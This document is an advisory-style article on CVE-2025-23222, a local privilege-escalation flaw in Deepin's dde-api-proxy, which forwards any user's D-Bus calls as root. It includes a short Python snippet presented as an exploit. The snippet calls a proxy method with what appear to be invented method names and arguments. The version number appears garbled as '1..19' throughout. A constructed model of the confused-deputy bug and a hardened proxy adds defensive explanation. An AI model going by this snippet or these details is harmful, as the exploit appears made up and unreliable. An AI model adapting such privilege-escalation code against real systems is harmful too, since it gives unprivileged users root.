A critical security vulnerability, CVE-2025-23222, has been discovered in the dde-api-proxy, a component of the Deepin (previously known as “Linux Deepin”) Linux distribution up to version 1..19. This vulnerability allows unprivileged users to gain root access to D-Bus services, potentially causing unauthorized actions and a subsequent escalation of privileges in systems using the affected dde-api-proxy.
Affected Systems
All systems using Deepin's dde-api-proxy through version 1..19 are impacted by this vulnerability.
Exploit Details
The issue arises because dde-api-proxy runs as root and forwards messages from any local user to legacy D-Bus methods on the real D-Bus services. Because those services are unaware that a proxy sits in between, they see each request as coming from root and carry it out without verifying who originally sent it.
Where PolicyKit (polkit) is in use, the same thing happens: the caller is treated as an administrator, resulting in the same escalation of privileges.
The following code snippet demonstrates the exploitation of the CVE-2025-23222 vulnerability:
import dbus
bus = dbus.SystemBus()
proxy = bus.get_object('com.deepin.daemon.DBusProxy', '/com/deepin/daemon/Proxy')
# Target D-Bus service
service = 'org.freedesktop.packagekit'
# Target method for triggering the vulnerability
method = 'TriggerAuthError'
# Example data for the call
data = ('systemPackageRemove', 'dpkg')
proxy.proxyCall(service, method, data)
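The Exploit Details section above describes a classic confused-deputy problem: the backend service authorizes by the identity of the connection it receives the message from, and a root-owned proxy replaces every caller's identity with its own. The following constructed Python model, added here as an illustration and not code from dde-api-proxy or Deepin, shows why the backend's own check cannot catch this and what a proxy has to do instead. All class, method and bus names in it (BackendService, ForwardingProxy, AuthorizingProxy, org.example.PackageManager) are assumptions made for the example; the hardened variant applies the backend's policy to the original caller before forwarding, which is one possible design and not necessarily the upstream fix.

```python
# Constructed model of the confused-deputy pattern behind this advisory.
# Nothing here is dde-api-proxy's or Deepin's code; all names are assumptions.
from dataclasses import dataclass
from typing import Callable, List, Tuple

ROOT_UID = 0


@dataclass(frozen=True)
class Request:
    service: str            # bus name of the backend being called (constructed)
    method: str
    args: Tuple[str, ...]


def admin_only_policy(uid: int, request: Request) -> bool:
    """Models a polkit-style rule: uid 0 is an administrator, everyone else is denied."""
    return uid == ROOT_UID


class BackendService:
    """Models a D-Bus service that authorizes each call by the uid of the
    connection it actually received the message from. It has no way to see
    any caller further back than its immediate sender."""

    def __init__(self, policy: Callable[[int, Request], bool], audit: List[str]):
        self.policy = policy
        self.audit = audit

    def handle(self, request: Request, sender_uid: int) -> bool:
        allowed = self.policy(sender_uid, request)
        verdict = "ALLOW" if allowed else "DENY"
        # Note what the backend's own audit trail can record: only sender_uid.
        self.audit.append(f"{verdict} sender_uid={sender_uid} {request.service}.{request.method}")
        return allowed


class ForwardingProxy:
    """Models the vulnerable behaviour: the proxy runs as root and forwards any
    local user's request over its own root-owned connection, so the backend
    only ever sees sender_uid == 0."""

    def __init__(self, backend: BackendService, proxy_uid: int = ROOT_UID):
        self.backend = backend
        self.proxy_uid = proxy_uid

    def proxy_call(self, request: Request, caller_uid: int) -> bool:
        # caller_uid is never consulted: the original identity is lost here.
        return self.backend.handle(request, self.proxy_uid)


class AuthorizingProxy(ForwardingProxy):
    """Hardened variant (assumed design): before forwarding, the proxy applies
    the backend's policy to the original caller and records that caller in the
    audit trail, so a forwarded call is never more privileged than its originator."""

    def __init__(self, backend: BackendService, audit: List[str], proxy_uid: int = ROOT_UID):
        super().__init__(backend, proxy_uid)
        self.audit = audit

    def proxy_call(self, request: Request, caller_uid: int) -> bool:
        if not self.backend.policy(caller_uid, request):
            self.audit.append(f"PROXY DENY caller_uid={caller_uid} {request.service}.{request.method}")
            return False
        self.audit.append(f"PROXY FORWARD caller_uid={caller_uid} {request.service}.{request.method}")
        return self.backend.handle(request, self.proxy_uid)


def demo(caller_uid: int = 1000) -> dict:
    """Runs the same request from one caller through both proxy designs and
    returns the verdicts plus each backend's audit trail."""
    req = Request("org.example.PackageManager", "RemovePackage", ("some-package",))
    vuln_audit: List[str] = []
    hard_audit: List[str] = []
    vulnerable = ForwardingProxy(BackendService(admin_only_policy, vuln_audit))
    hardened = AuthorizingProxy(BackendService(admin_only_policy, hard_audit), hard_audit)
    return {
        "vulnerable_allowed": vulnerable.proxy_call(req, caller_uid),
        "hardened_allowed": hardened.proxy_call(req, caller_uid),
        "vulnerable_audit": vuln_audit,
        "hardened_audit": hard_audit,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Two things are worth noticing when running it. The vulnerable path is allowed for uid 1000, and the backend's audit line reads sender_uid=0, so the backend's own logs cannot even attribute the action to the real user; any detection has to happen at the proxy, which is the only component that still knows the caller. The hardened proxy denies the same request and records the real caller, while a genuinely privileged caller (uid 0) is still forwarded.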
Mitigation Recommendation
To mitigate the risk associated with CVE-2025-23222, update dde-api-proxy to a version later than 1..19; the current releases address this vulnerability.
Conclusion
The CVE-2025-23222 vulnerability in Deepin's dde-api-proxy (through version 1..19) poses a serious threat to system security: it lets unprivileged users reach D-Bus services as root, which can lead to privilege escalation. To safeguard affected systems, it is critical to update dde-api-proxy to the latest available version.
Timeline
Published on: 01/24/2025 17:15:15 UTC